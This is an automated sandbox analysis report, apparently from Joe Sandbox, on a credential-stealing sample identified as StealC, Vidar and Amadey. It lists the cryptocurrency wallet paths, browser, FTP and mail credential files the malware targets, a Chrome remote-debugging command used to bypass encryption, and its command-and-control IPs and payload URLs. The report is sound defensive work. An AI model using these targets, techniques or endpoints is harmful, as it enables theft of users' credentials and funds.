Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: allet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1978262092.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1978262092.0000000000611000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7560, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20C40 sqlite3_bind_zeroblob,	0_2_6CC20C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20D60 sqlite3_bind_parameter_name,	0_2_6CC20D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48EA0 sqlite3_clear_bindings,	0_2_6CB48EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC20B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6CC20B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB46410 bind,WSAGetLastError,	0_2_6CB46410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB460B0 listen,WSAGetLastError,	0_2_6CB460B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4C030 sqlite3_bind_parameter_count,	0_2_6CB4C030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB46070 PR_Listen,	0_2_6CB46070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB4C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6CB4C050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAD22D0 sqlite3_bind_blob,	0_2_6CAD22D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB463C0 PR_Bind,	0_2_6CB463C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB49480 sqlite3_bind_null,	0_2_6CB49480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB494F0 sqlite3_bind_text16,	0_2_6CB494F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB494C0 sqlite3_bind_text,	0_2_6CB494C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB49400 sqlite3_bind_int64,	0_2_6CB49400

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.19.206	www3.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
216.58.208.228	www.google.com	United States	15169	GOOGLEUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true

Private

IP
192.168.2.8
127.0.0.1

Contacted Domains

Name	IP	Active
www3.l.google.com	172.217.19.206	true
plus.l.google.com	172.217.17.78	true
www.google.com	216.58.208.228	true
ogs.google.com	unknown	unknown
apis.google.com	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
http://185.215.113.206/	false	high
http://185.215.113.16/mine/random.exe	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	false	high
http://185.215.113.206/c4becf79229cb002.php	false	high
https://www.google.com/async/newtab_promos	false	high
https://www.google.com/async/ddljson?async=ntp:2	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/softokn3.dll:oH	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllct	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php003	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpUE	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpt8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpc60ab594776c83eaa9bd06ecc7f8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllCu	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpL8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dll)o	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllX	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php.L	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllOt	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dll-u	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllwo	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 00000012.00000002.2062939332.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Joe Sandbox ML: detected
